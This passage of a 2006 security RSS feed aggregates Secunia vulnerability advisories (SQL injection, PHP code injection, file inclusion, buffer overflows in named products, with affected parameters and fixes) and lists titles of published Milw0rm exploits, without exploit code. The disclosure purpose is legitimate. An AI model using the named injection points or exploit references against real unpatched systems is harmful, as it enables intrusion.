1) Input passed to the "recherche" form field in parameter in recherchemembre.php and to the "email" parameter in test.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.<br>
<br>
2) Input passed to the "recherche" form field parameter in recherchemembre.php is also not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.<br>
<br>
Successful exploitation requires that "magic_quotes_gpc" is disabled.<br>
<br>
3) Input passed to multiple parameters in include/change.php is not properly sanitised before being stored in a PHP script. This can be exploited to inject and execute arbitrary PHP code.<br>
<br>
Successful exploitation requires that "register_globals" is enabled and "magic_quotes_gpc" is disabled.<br>
<br>
The vulnerabilities have been confirmed in version 1.5. Other versions may also be affected.<br>
<br>
Solution:<br>
Edit the source code to ensure that input is properly sanitised.<br>
<br>
Provided and/or discovered by:<br>
DarkFig]]></description>
            <link>http://secunia.com/advisories/21715/</link>
            <pubDate>Fri, 08 Sep 2006 13:57:17 -0400</pubDate>
        </item>

        <item>
            <title>Tumbleweed EMF ZOO Archive Processing Buffer Overflow</title>
            <description><![CDATA[Secunia Advisory:   	 SA21718  	  <br>
Release Date: 	2006-09-01<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
Software:	MailGate Email Firewall 6.x<br>
<br>
<br>
Description:<br>
A vulnerability has been reported in Tumbleweed EMF, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
For more information:<br>
SA21714<br>
<br>
Solution:<br>
Apply hotfix.<br>
https://kb1.tumbelweed.com/article.asp?article=4175&p=2<br>
<br>
Provided and/or discovered by:<br>
Michael Ligh, Greg Sinclair, and Amanda Wright.<br>
<br>
Other References:<br>
SA21714:<br>
http://secunia.com/advisories/21714/]]></description>
            <link>http://secunia.com/advisories/21718/</link>
            <pubDate>Fri, 08 Sep 2006 13:56:12 -0400</pubDate>
        </item>

        <item>
            <title>Capi4Hylafax Shell Command Injection</title>
            <description><![CDATA[Secunia Advisory:   	 SA21726  	  <br>
Release Date: 	2006-09-01<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	System access<br>
Where: 	From remote<br>
Solution Status: 	Unpatched<br>
<br>
Software:	CAPI4Hylafax 1.x<br>
<br>
CVE reference:	CVE-2006-3126 (Secunia mirror)<br>
<br>
<br>
Description:<br>
A vulnerability has been reported in Capi4Hylafax, which potentially can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
The vulnerability is caused due to an error in c2faxrecv, which doesn't properly sanitise TSI strings when handling incoming calls. This can be exploited to execute shell commands with privileges of the user running c2faxrecv.<br>
<br>
Solution:<br>
Use another product.<br>
<br>
Provided and/or discovered by:<br>
Lionel Elie Mamane<br>
<br>
Original Advisory:<br>
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=382474]]></description>
            <link>http://secunia.com/advisories/21726/</link>
            <pubDate>Fri, 08 Sep 2006 13:55:53 -0400</pubDate>
        </item>

        <item>
            <title>TikiWiki jhot.php File Upload Vulnerability</title>
            <description><![CDATA[TikiWiki jhot.php File Upload Vulnerability   	 Advisory Available in Danish <br>
<br>
Secunia Advisory: 	SA21733 	 <br>
Release Date: 	2006-09-04<br>
Last Update: 	2006-09-08<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	System access<br>
Where: 	From remote<br>
Solution Status: 	Unpatched<br>
<br>
Software:	TikiWiki 1.x<br>
<br>
CVE reference:	CVE-2006-4602 (Secunia mirror)<br>
<br>
<br>
Description:<br>
rgod has discovered a vulnerability in TikiWiki, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
The vulnerability is caused due to the "jhot.php" script not correctly verifying uploaded files. This can e.g. be exploited to execute arbitrary PHP code by uploading a malicious PHP script to the "img/wiki" directory.<br>
<br>
The vulnerability has been confirmed in version 1.9.4. Other versions may also be affected.<br>
<br>
Solution:<br>
Edit the source code to ensure proper handling of uploaded files.<br>
<br>
Provided and/or discovered by:<br>
rgod<br>
<br>
Changelog:<br>
2006-09-08: Added CVE reference.<br>
<br>
<br>
]]></description>
            <link>http://secunia.com/advisories/21733/</link>
            <pubDate>Fri, 08 Sep 2006 13:54:40 -0400</pubDate>
        </item>

        <item>
            <title>CR64Loader ActiveX Control Buffer Overflow Vulnerability</title>
            <description><![CDATA[Secunia Advisory:   	 SA21743  	  <br>
Release Date: 	2006-09-04<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	System access<br>
Where: 	From remote<br>
Solution Status: 	Unpatched<br>
<br>
Software:	Retro64 CR64Loader ActiveX Control<br>
<br>
<br>
Description:<br>
CERT/CC has reported a vulnerability in CR64Loader ActiveX Control, which can be exploited by malicious people to compromise a user's system.<br>
<br>
The vulnerability is caused due to an unspecified boundary error and can be exploited to cause a buffer overflow when e.g. visiting a malicious website.<br>
<br>
Successful exploitation allows execution of arbitrary code.<br>
<br>
Solution:<br>
Set the kill bit for CLSID: "{288C5F13-7E52-4ADA-A32E-F5BF9D125F99}"<br>
<br>
See Microsoft KB240797 for details.<br>
<br>
Provided and/or discovered by:<br>
Will Dormann, CERT/CC.<br>
<br>
Original Advisory:<br>
US-CERT VU#649289:<br>
http://www.kb.cert.org/vuls/id/649289<br>
<br>
Other References:<br>
Microsoft KB240797:<br>
http://support.microsoft.com/kb/240797]]></description>
            <link>http://secunia.com/advisories/21743/</link>
            <pubDate>Fri, 08 Sep 2006 13:53:56 -0400</pubDate>
        </item>

        <item>
            <title>SUSE Update for Multiple Packages</title>
            <description><![CDATA[Secunia Advisory:   	 SA21749  	  <br>
Release Date: 	2006-09-04<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	Security Bypass<br>
Manipulation of data<br>
DoS<br>
System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
OS:	SuSE eMail Server 3.x<br>
SUSE Linux 10<br>
SUSE Linux 10.1<br>
SuSE Linux 7.x<br>
SuSE Linux 8.x<br>
SuSE Linux 9.0<br>
SuSE Linux 9.1<br>
SUSE Linux 9.2<br>
SUSE Linux 9.3<br>
SuSE Linux Connectivity Server<br>
SuSE Linux Database Server<br>
SuSE Linux Desktop 1.x<br>
SuSE Linux Enterprise Server 7<br>
SuSE Linux Enterprise Server 8<br>
SUSE Linux Enterprise Server 9<br>
SuSE Linux Firewall on CD/Admin host<br>
SuSE Linux Office Server<br>
SuSE Linux Openexchange Server 4.x<br>
SuSE Linux Standard Server 8<br>
<br>
CVE reference:	CVE-2006-2314 (Secunia mirror)<br>
CVE-2006-3124 (Secunia mirror)<br>
CVE-2006-3125 (Secunia mirror)<br>
CVE-2006-3694 (Secunia mirror)<br>
CVE-2006-4434 (Secunia mirror)<br>
CVE-2006-4089 (Secunia mirror)<br>
CVE-2006-4111 (Secunia mirror)<br>
CVE-2006-4112 (Secunia mirror)<br>
<br>
<br>
Description:<br>
SUSE has issued an update for multiple packages. These fix some vulnerabilities, which can be exploited by malicious users to bypass certain security restrictions, or by malicious people to conduct SQL injections attacks, cause a DoS (Denial of Service), bypass certain security restrictions, and compromise a vulnerable system.<br>
<br>
For more information:<br>
SA20231<br>
SA21009<br>
SA21422<br>
SA21424<br>
SA21579<br>
SA21637<br>
SA21691<br>
SA21721<br>
<br>
Solution:<br>
Apply updated packages.<br>
<br>
Updated packages are available using YaST Online Update or via the SUSE FTP site.<br>
<br>
Original Advisory:<br>
http://lists.suse.com/archive/suse-security-announce/2006-Sep/0001.html<br>
<br>
Other References:<br>
SA20231:<br>
http://secunia.com/advisories/20231/<br>
<br>
SA21009:<br>
http://secunia.com/advisories/21009/<br>
<br>
SA21422:<br>
http://secunia.com/advisories/21422/<br>
<br>
SA21424:<br>
http://secunia.com/advisories/21424/<br>
<br>
SA21579:<br>
http://secunia.com/advisories/21579/<br>
<br>
SA21637:<br>
http://secunia.com/advisories/21637/<br>
<br>
SA21691:<br>
http://secunia.com/advisories/21691/<br>
<br>
SA21721:<br>
http://secunia.com/advisories/21721/<br>
<br>
<br>
]]></description>
            <link>http://secunia.com/advisories/21749/</link>
            <pubDate>Fri, 08 Sep 2006 13:53:17 -0400</pubDate>
        </item>

        <item>
            <title>Microsoft Word 2000 Unspecified Code Execution Vulnerability</title>
            <description><![CDATA[Secunia Advisory:   	 SA21735  	  <br>
Release Date: 	2006-09-05<br>
Last Update: 	2006-09-07<br>
<br>
Critical: 	<br>
Extremely critical<br>
Impact: 	System access<br>
Where: 	From remote<br>
Solution Status: 	Unpatched<br>
<br>
Software:	Microsoft Office 2000<br>
Microsoft Word 2000<br>
<br>
CVE reference:	CVE-2006-4534 (Secunia mirror)<br>
<br>
<br>
Description:<br>
A vulnerability has been discovered in Microsoft Word 2000, which can be exploited by malicious people to compromise a user's system.<br>
<br>
The vulnerability is caused due to a memory corruption error in WINWORD.EXE when processing Word documents. This can be exploited to execute arbitrary code when a malicious document is opened.<br>
<br>
NOTE: The vulnerability is being actively exploited.<br>
<br>
The vulnerability is confirmed in a fully patched Microsoft Word 2000 and has currently not been confirmed in other versions. However, they may be affected.<br>
<br>
Solution:<br>
Do not open untrusted Office documents.<br>
<br>
Provided and/or discovered by:<br>
Discovered in the wild as a 0-day.<br>
<br>
Changelog:<br>
2006-09-06: Secunia confirms vulnerability. Added additional information.<br>
2006-09-07: Added link to Microsoft security advisory. Added CVE reference. Added link to US-CERT.<br>
<br>
Original Advisory:<br>
Microsoft:<br>
http://www.microsoft.com/technet/security/advisory/925059.mspx<br>
<br>
Other References:<br>
US-CERT VU#806548:<br>
http://www.kb.cert.org/vuls/id/806548]]></description>
            <link>http://secunia.com/advisories/21735/</link>
            <pubDate>Fri, 08 Sep 2006 13:52:35 -0400</pubDate>
        </item>

        <item>
            <title>Ipswitch IMail Server SMTP Service Buffer Overflow Vulnerability</title>
            <description><![CDATA[Secunia Advisory:   	 SA21795  	  <br>
Release Date: 	2006-09-07<br>
Last Update: 	2006-09-08<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
Software:	IMail Secure Server 2006<br>
IMail Server 2006<br>
Ipswitch Collaboration Suite 2006<br>
<br>
CVE reference:	CVE-2006-4379 (Secunia mirror)<br>
<br>
<br>
Description:<br>
A vulnerability has been reported in IMail Server, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
The vulnerability is caused due to a boundary error in the SMTP service when processing certain strings. This can be exploited to cause a stack-based buffer overflow by supplying an overly long string containing "@" and ":" characters.<br>
<br>
Successful exploitation allows execution of arbitrary code.<br>
<br>
The vulnerability is reported in the following versions:<br>
* Ipswitch Collaboration 2006 Suite Premium Edition<br>
* Ipswitch Collaboration 2006 Suite Standard Edition<br>
* IMail<br>
* IMail Plus<br>
* IMail Secure<br>
<br>
Solution:<br>
Update to version 2006.1.<br>
<br>
Ipswitch Collaboration Suite Premium Edition:<br>
ftp://ftp.ipswitch.com/Ipswitch/Product_Downloads/ICS_Premium.exe<br>
<br>
Ipswitch Collaboration Suite Standard Edition:<br>
ftp://ftp.ipswitch.com/Ipswitch/Product_Downloads/ICS_Standard.exe<br>
<br>
IMail:<br>
ftp://ftp.ipswitch.com/Ipswitch/Product_Downloads/IMail.exe<br>
<br>
IMail Plus:<br>
ftp://ftp.ipswitch.com/Ipswitch/Product_Downloads/IMail_Plus.exe<br>
<br>
IMail Secure:<br>
ftp://ftp.ipswitch.com/Ipswitch/Product_Downloads/IMail_Secure.exe<br>
<br>
Provided and/or discovered by:<br>
Discovered by an anonymous person and reported via ZDI.<br>
<br>
Changelog:<br>
2006-09-08: Added CVE reference and additional information from ZDI.<br>
<br>
Original Advisory:<br>
Ipswitch:<br>
http://www.ipswitch.com/support/ics/updates/ics20061.asp<br>
http://www.ipswitch.com/support/imail/releases/im20061.asp<br>
<br>
ZDI:<br>
http://www.zerodayinitiative.com/advisories/ZDI-06-028.html<br>
]]></description>
            <link>http://secunia.com/advisories/21795/</link>
            <pubDate>Fri, 08 Sep 2006 13:51:16 -0400</pubDate>
        </item>

        <item>
            <title>phpBB Premod Shadow &quot;phpbb_root_path&quot; File Inclusion</title>
            <description><![CDATA[Secunia Advisory:   	 SA21803  	  <br>
Release Date: 	2006-09-07<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	System access<br>
Where: 	From remote<br>
Solution Status: 	Unpatched<br>
<br>
Software:	phpBB Premod Shadow 2.x<br>
<br>
<br>
Description:<br>
Kw3[R]Ln has discovered a vulnerability in phpBB Premod Shadow, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
Input passed to the "phpbb_root_path" parameter in includes/functions_portal.php isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from external and local resources.<br>
<br>
Successful exploitation requires that "register_globals" is enabled.<br>
<br>
The vulnerability has been confirmed in version 2.7.1. Other versions may also be affected.<br>
<br>
Solution:<br>
Edit the source code to ensure that input is properly verified.<br>
<br>
Set "register_globals" to "Off".<br>
<br>
Provided and/or discovered by:<br>
Kw3[R]Ln<br>
<br>
Original Advisory:<br>
http://rst-crew.net/premodshadow.txt<br>
]]></description>
            <link>http://secunia.com/advisories/21803/</link>
            <pubDate>Fri, 08 Sep 2006 13:48:25 -0400</pubDate>
        </item>

        <item>
            <title>dsocks &quot;_tor_resolve&quot; Buffer Overflow Vulnerability</title>
            <description><![CDATA[Secunia Advisory:   	 SA21771  	  <br>
Release Date: 	2006-09-08<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	DoS<br>
System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
Software:	dsocks 1.x<br>
<br>
<br>
Description:<br>
Michael Adams has reported a vulnerability in dsocks, which potentially can be exploited by malicious people to compromise a user's system.<br>
<br>
The vulnerability is due to a boundary error in the "_tor_resolve()" function in dsocks.c. This can be exploited to cause a stack-based buffer overflow when resolving an overly long host name (e.g. supplied by a malicious website when using dsocks with a browser).<br>
<br>
Successful exploitation may allow arbitrary code execution.<br>
<br>
Solution:<br>
Update to version 1.4.<br>
<br>
Provided and/or discovered by:<br>
Michael Adams<br>
<br>
<br>
]]></description>
            <link>http://secunia.com/advisories/21771/</link>
            <pubDate>Fri, 08 Sep 2006 13:47:28 -0400</pubDate>
        </item>

        <item>
            <title>avast! LHA Archive Processing Buffer Overflow Vulnerability</title>
            <description><![CDATA[Secunia Advisory:   	 SA21794  	  <br>
Release Date: 	2006-09-08<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
Software:	avast! Home/Professional 4.x<br>
avast! Server Edition 4.x<br>
<br>
CVE reference:	CVE-2006-4626 (Secunia mirror)<br>
<br>
<br>
Description:<br>
Ryan Smith has reported a vulnerability in avast!, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
The vulnerability is caused due to a boundary error in the anti-virus engine when processing LHA archives. This can be exploited to cause a heap-based buffer overflow via a specially crafted LHA archive with overly long filename and directory name extended-header fields.<br>
<br>
Successful exploitation allows execution of arbitrary code.<br>
<br>
The vulnerability is reported in the anti-virus engine prior to versions 4.7.869 for desktops and 4.7.660 for servers.<br>
<br>
Solution:<br>
Update to a fixed version.<br>
<br>
Provided and/or discovered by:<br>
Ryan Smith<br>
<br>
Original Advisory:<br>
http://www.hustlelabs.com/advisories/04072006_alwil.pdf]]></description>
            <link>http://secunia.com/advisories/21794/</link>
            <pubDate>Fri, 08 Sep 2006 13:46:51 -0400</pubDate>
        </item>

        <item>
            <title>Fantastic News &quot;CONFIG[script_path]&quot; File Inclusion Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:   	 SA21807  	  <br>
Release Date: 	2006-09-08<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	System access<br>
Where: 	From remote<br>
Solution Status: 	Unpatched<br>
<br>
Software:	Fantastic News 2.x<br>
<br>
<br>
Description:<br>
Two vulnerabilities have been discovered in Fantastic News, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
Input passed to the "CONFIG[script_path]" parameter in archive.php and headlines.php isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from external and local resources.<br>
<br>
Successful exploitation requires that "register_globals" is enabled.<br>
<br>
The vulnerabilities have been confirmed in version 2.1.4. Other versions may also be affected.<br>
<br>
Solution:<br>
Edit the source code to ensure that input is properly verified.<br>
<br>
Set "register_globals" to "Off".<br>
<br>
Provided and/or discovered by:<br>
Sx02 and anonymous person.<br>
<br>
Original Advisory:<br>
http://sx02.coresec.de/advisories/152.txt<br>
]]></description>
            <link>http://secunia.com/advisories/21807/</link>
            <pubDate>Fri, 08 Sep 2006 13:46:00 -0400</pubDate>
        </item>

        <item>
            <title>DokuWiki &quot;TARGET_FN&quot; Directory Traversal Vulnerability</title>
            <description><![CDATA[Secunia Advisory:   	 SA21819  	  <br>
Release Date: 	2006-09-08<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
Software:	DokuWiki<br>
<br>
<br>
Description:<br>
rgod has discovered a vulnerability in DokuWiki, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
Input passed to the "TARGET_FN" parameter in bin/dwpage.php is not properly sanitised before being used to copy files. This can be exploited via directory traversal attacks in combination with DokuWiki's file upload feature to execute arbitrary PHP code.<br>
<br>
The vulnerability is confirmed in version 2006-03-09b. Other versions may also be affected,<br>
<br>
Solution:<br>
Update to version 2006-03-09c and enable support for .htaccess files.<br>
<br>
Provided and/or discovered by:<br>
rgod<br>
]]></description>
            <link>http://secunia.com/advisories/21819/</link>
            <pubDate>Fri, 08 Sep 2006 13:45:02 -0400</pubDate>
        </item>

        <item>
            <title>ICQ Pro 2003b &quot;MCRegEx__Search&quot; Buffer Overflow Vulnerability</title>
            <description><![CDATA[Secunia Advisory:   	 SA21834  	  <br>
Release Date: 	2006-09-08<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	System access<br>
Where: 	From remote<br>
Solution Status: 	Unpatched<br>
<br>
Software:	ICQ 2003b<br>
<br>
<br>
Description:<br>
Core Security Technologies has reported a vulnerability in ICQ Pro 2003b, which can be exploited by malicious people to compromise a user's system.<br>
<br>
The vulnerability is caused due to a boundary error in the "MCRegEx__Search()" function in the processing of messages with a certain type. This can be exploited to cause a heap-based buffer overflow by specifying an incorrect length value in a message sent to the client.<br>
<br>
Successful exploitation allows execution of arbitrary code.<br>
<br>
The vulnerability has been reported in build 3916. Other versions may also be affected.<br>
<br>
Solution:<br>
The vendor recommends upgrading to ICQ 5.1.<br>
<br>
Provided and/or discovered by:<br>
Luciana Tabo, Lucas Lavarello, Sebastian Cufre, Ezequiel Gutesman, and Javier Garcia Di Palma from Core Security Technologies.<br>
<br>
Original Advisory:<br>
http://www.coresecurity.com/index.php...ontentMod&action=item&id=1509]]></description>
            <link>http://secunia.com/advisories/21834/</link>
            <pubDate>Fri, 08 Sep 2006 13:44:27 -0400</pubDate>
        </item>

        <item>
            <title>Exploits from Milw0rm</title>
            <description><![CDATA[2006-09-08      RaidenHTTPD 1.1.49 (SoftParserFileXml) Remote Code Execution Exploit <br>   
2006-09-07      IBM Director <5.10 (Redirect.bat) Directory Transversal Vulnerability<br>
2006-09-01      TIBCO Rendezvous <= 7.4.11 (add router) Remote BOF Exploit <br>
2006-08-29      Streamripper <= 1.61.25 HTTP Header Parsing Buffer Overflow Exploit <br>
2006-08-29      IBM eGatherer <= 3.20.0284.0 (ActiveX) Remote Code Execution Exploit    <br>
2006-08-29      Streamripper <= 1.61.25 HTTP Header Parsing Buffer Overflow Exploit <br>
2006-09-08      X11R6 <= 6.4 XKEYBOARD Local Buffer Overflow Exploit (solaris/sparc)<br>
2006-09-08      X11R6 <= 6.4 XKEYBOARD Local Buffer Overflow Exploit (solaris/x86)<br>
2006-09-08      X11R6 <= 6.4 XKEYBOARD Local Buffer Overflow Exploit (sco/x86)<br>
2006-09-01      TIBCO Rendezvous <= 7.4.11 Password Extractor Local Exploit <br>
2006-09-01      PowerZip <= 7.06.3895 Long Filename Handling Buffer Overflow Exploit   <br> 2006-08-30      ZipCentral 4.01 ZIP File Handling Local Buffer Overflow Exploit <br>
2006-09-08      Somery <= 0.4.6 (skin_dir) Remote File Include Vulnerability    <br>
2006-09-07      PayProCart <= 1146078425 Multiple Remote File Include Vulnerabilities  <br>
2006-09-07      SL_Site <= 1.0 (spaw_root) Remote File Include Vulnerability   <br>
2006-09-07      Web Server Creator v0.1 (l) Remote Include Vulnerability    <br>    
2006-09-07      Fire Soft Board <= RC 3 (racine) Remote File Include Vulnerability <br>
2006-09-07      DokuWiki <= 2006-03-09b (dwpage.php) Remote Code Execution Exploit  <br>    
2006-09-07      DokuWiki <= 2006-03-09b (dwpage.php) System Disclosure Exploit <br>
2006-09-07      PhpNews 1.0 (Include) Remote File Include Vulnerabilities      <br>
2006-09-07      ACGV News 0.9.1 (PathNews) Remote File Include Vulnerability<br>
2006-09-07      News Evolution 3.0.3 _NE[AbsPath] Remote File Include Vulnerabilities<br> 2006-09-07      WM-News <= 0.5 Multiple Remote File Include Vulnerabilities <br>
2006-09-07      PhotoKorn Gallery <= 1.52 (dir_path) Remote File Include Vulnerabilities    <br>    
2006-09-06      phpBB Shadow Premod <= 2.7.1 Remote File Include Vulnerability<br>
2006-09-06      BinGo News <= 3.01 (bnrep) Remote File Include Vulnerability<br>
2006-09-06      phpFullAnnu <= 5.1 (repmod) Remote File Include Vulnerability  <br>
2006-09-06      Beautifier 0.1 (Core.php) Remote File Include Vulnerability<br>
2006-09-06      Akarru <= 0.4.3.34 (bm_content) Remote File Include Vulnerability<br>
2006-09-05      MySpeach <= 3.0.2 (my_ms[root]) Remote File Include Vulnerability   <br>   2006-09-05      GrapAgenda 0.1 (page) Remote File Include Vulnerability <br>
2006-09-05      AnnonceV News Script <= 1.1 (page) Remote File Include Vulnerability   <br>
2006-09-05      Zix Forum <= 1.12 (RepId) Remote SQL Injection Vulnerability   <br> 
2006-09-05      ACGV News <= 0.9.1 (PathNews) Remote File Inclusion Vulnerability    <br>
2006-09-05      C-News <= 1.0.1 (path) Remote File Inclusion Vulnerability     <br>
2006-09-05      Sponge News <= 2.2 (sndir) Remote File Include Vulnerability <br>
2006-09-05      PhpCommander <= 3.0 Remote Code Execution Exploit (mq=off)<br>
2006-09-04      FlashChat <= 4.5.7 (aedating4CMS.php) Remote File Include Vulnerability<br> 2006-09-04      In-link <= 2.3.4 (ADODB_DIR) Remote File Include Vulnerabilities <br>      
2006-09-04      SimpleBlog <= 2.3 (id) Remote SQL Injection Vulnerability  <br>     
2006-09-04      Tr Forum 2.0 SQL Injection / Bypass Security Restriction Exploit<br>
2006-09-04      pHNews <= alpha 1 (templates_dir) Remote Code Execution Exploit <br>
2006-09-04      PHP Proxima <= v.6 completepack Remote Code Execution Exploit   <br>
2006-09-04      SoftBB 0.1 (cmd) Remote Command Execution Exploit   <br>    
2006-09-03      PmWiki <= 2.1.19 (Zend_Hash_Del_Key_Or_Index) Remote Exploit  <br>  
2006-09-03      yappa-ng <= 2.3.1 (admin_modules) Remote File Include Vulnerability <br>
2006-09-03      Muratsoft Haber Portal 3.6 (tr) Remote SQL Injection Vulnerability  <br>  
2006-09-02      TikiWiki <= 1.9 Sirius (jhot.php) Remote Command Execution Exploit<br>
2006-09-02      Annuaire 1Two 2.2 Remote SQL Injection Exploit <br>
2006-09-02      Dyncms <= Release 6 (x_admindir) Remote File Include Vulnerability <br>
2006-09-01      MyBace Light (login_check.php) Remote File Vulnerability   <br>     
2006-09-01      icblogger v2 (YID) Remote SQL Injection Vulnerability  <br>
2006-08-31      Pheap CMS <= 1.1 (lpref) Remote File Include Exploit  <br>
2006-08-31      YACS CMS <= 6.6.1 context[path_to_root] Remote File Include Vuln <br>
2006-08-30      phpAtm <= 1.21 (include_location) Remote File Include Vulnerabilities<br>
2006-08-30      Lanifex DMO <= 2.3b (_incMgr) Remote File Include Exploit       <br>
2006-08-29      phpGroupWare <= 0.9.16.010 GLOBALS[] Remote Code Execution Exploit <br>     2006-08-29      PortailPHP mod_phpalbum <= 2.1.5 (chemin) Remote Include Vuln   <br>
2006-08-29      MiniBill <= 1.22b config[plugin_dir] Remote File Inclusion Vulnerabilities    <br>  2006-08-29      ExBB Italiano <= 0.2 exbb[home_path] Remote File Include Vulnerability  <br>
2006-08-29      phpECard <= 2.1.4 (functions.php) Remote File Include Vulnerability    <br>
2006-09-05      J. River Media Center 11.0.309 Remote Denial of Service PoC     <br>
2006-09-05      dsock <= 1.3 (buf) Remote Buffer Overflow PoC   <br>
]]></description>
            <link>http://www.milw0rm.com</link>
            <pubDate>Fri, 08 Sep 2006 10:33:36 -0400</pubDate>
        </item>

        <item>
            <title>Exploits from Milw0rm</title>
            <description><![CDATA[2006-08-28	MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2)<br>
2006-08-26	MDaemon POP3 Server <9.06 (USER) Remote Heap Overflow Exploit<br>
2006-08-27	VMware 5.5.1 (ActiveX) Local Buffer Overflow Exploit<br>
2006-08-27	AlberT-EasySite <= 1.0a5 (PSA_PATH) Remote File Include Exploit<br>
2006-08-27	iziContents <= RC6 GLOBALS[] Remote Code Execution Exploit<br>
2006-08-27	CMS Frogss <= 0.4 (podpis) Remote SQL Injection Exploit<br>
2006-08-27	Ay System CMS <= 2.6 (main.php) Remote File Include Vulnerability<br>
2006-08-26	proManager <= 0.73 (note.php) Remote SQL Injection Vulnerability<br>
]]></description>
            <link>http://www.milw0rm.com/exploits/</link>
            <pubDate>Mon, 28 Aug 2006 08:12:39 -0400</pubDate>
        </item>

        <item>
            <title>Gentoo alsaplayer Multiple Buffer Overflow Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:   	 SA21639  	  <br>
Release Date: 	2006-08-28<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	DoS<br>
System access<br>
Where: 	From remote<br>
Solution Status: 	Unpatched<br>
<br>
OS:	Gentoo Linux 1.x<br>
<br>
CVE reference:	CVE-2006-4089 (Secunia mirror)<br>
<br>
<br>
Description:<br>
Gentoo has acknowledged some vulnerabilities in alsaplayer, which potentially can be exploited by malicious people to compromise a user's system.<br>
<br>
For more information:<br>
SA21422<br>
<br>
Solution:<br>
Gentoo advises to unmerge the "media-sound/alsaplayer" package.<br>
<br>
Original Advisory:<br>
http://www.gentoo.org/security/en/glsa/glsa-200608-24.xml<br>
<br>
Other References:<br>
SA21422:<br>
http://secunia.com/advisories/21422/<br>
<br>
<br>
]]></description>
            <link>http://secunia.com/advisories/21639/</link>
            <pubDate>Mon, 28 Aug 2006 08:11:56 -0400</pubDate>
        </item>

        <item>
            <title>Debian update for mozilla-thunderbird</title>
            <description><![CDATA[Secunia Advisory:   	 SA21654  	  <br>
Release Date: 	2006-08-28<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	Security Bypass<br>
Cross Site Scripting<br>
DoS<br>
System access<br>
Where: 	From remote<br>
Solution Status: 	Partial Fix<br>
<br>
OS:	Debian GNU/Linux 3.1<br>
Debian GNU/Linux unstable alias sid<br>
<br>
CVE reference:	CVE-2006-2779 (Secunia mirror)<br>
CVE-2006-3805 (Secunia mirror)<br>
CVE-2006-3806 (Secunia mirror)<br>
CVE-2006-3807 (Secunia mirror)<br>
CVE-2006-3808 (Secunia mirror)<br>
CVE-2006-3809 (Secunia mirror)<br>
CVE-2006-3810 (Secunia mirror)<br>
<br>
<br>
Description:<br>
Debian has issued an update for mozilla-thunderbird. This fixes some vulnerabilities, which can be exploited by malicious people to bypass certain security restrictions, conduct cross-site scripting attacks and potentially compromise a user's system.<br>
<br>
For more information:<br>
SA19873<br>
SA20382<br>
SA21228<br>
<br>
Solution:<br>
Apply updated packages.<br>
<br>
NOTE: CVE-2006-2779 is not completely fixed in this update. As a workaround, Debian recommends disabling JavaScript.<br>
<br>
-- Debian GNU/Linux 3.1 alias sarge --<br>
<br>
Source archives:<br>
http://security.debian.org/pool/updat...thunderbird_1.0.2-2.sarge1.0.8b.1.dsc<br>
Size/MD5 checksum: 1003 04d64af96e791f70b148b47369e78fa8<br>
http://security.debian.org/pool/updat...derbird_1.0.2-2.sarge1.0.8b.1.diff.gz<br>
Size/MD5 checksum: 485519 ee4edfac117a53c5af08ed97fe85fe55<br>
http://security.debian.org/pool/updat...mozilla-thunderbird_1.0.2.orig.tar.gz<br>
Size/MD5 checksum: 33288906 806175393a226670aa66060452d31df4<br>
<br>
Alpha architecture:<br>
<br>
http://security.debian.org/pool/updat...rbird_1.0.2-2.sarge1.0.8b.1_alpha.deb<br>
Size/MD5 checksum: 12848642 4c5bcb9649ff7eec7d4ad6409fccfbce<br>
http://security.debian.org/pool/updat...d-dev_1.0.2-2.sarge1.0.8b.1_alpha.deb<br>
Size/MD5 checksum: 3279330 5de619881da404d6846a64e1ab100198<br>
http://security.debian.org/pool/updat...ector_1.0.2-2.sarge1.0.8b.1_alpha.deb<br>
Size/MD5 checksum: 151606 aca457a945d7a89cc5ad25952db6d32b<br>
http://security.debian.org/pool/updat...fline_1.0.2-2.sarge1.0.8b.1_alpha.deb<br>
Size/MD5 checksum: 33038 f219f0a68ebce04be1a448d582330e36<br>
http://security.debian.org/pool/updat...dfind_1.0.2-2.sarge1.0.8b.1_alpha.deb<br>
Size/MD5 checksum: 88998 349021463f3a1fca2c269044cf3e66ca<br>
<br>
AMD64 architecture:<br>
<br>
http://security.debian.org/pool/updat...rbird_1.0.2-2.sarge1.0.8b.1_amd64.deb<br>
Size/MD5 checksum: 12255144 bacce34b5bc0e00ae8dfdcb6db7effee<br>
http://security.debian.org/pool/updat...d-dev_1.0.2-2.sarge1.0.8b.1_amd64.deb<br>
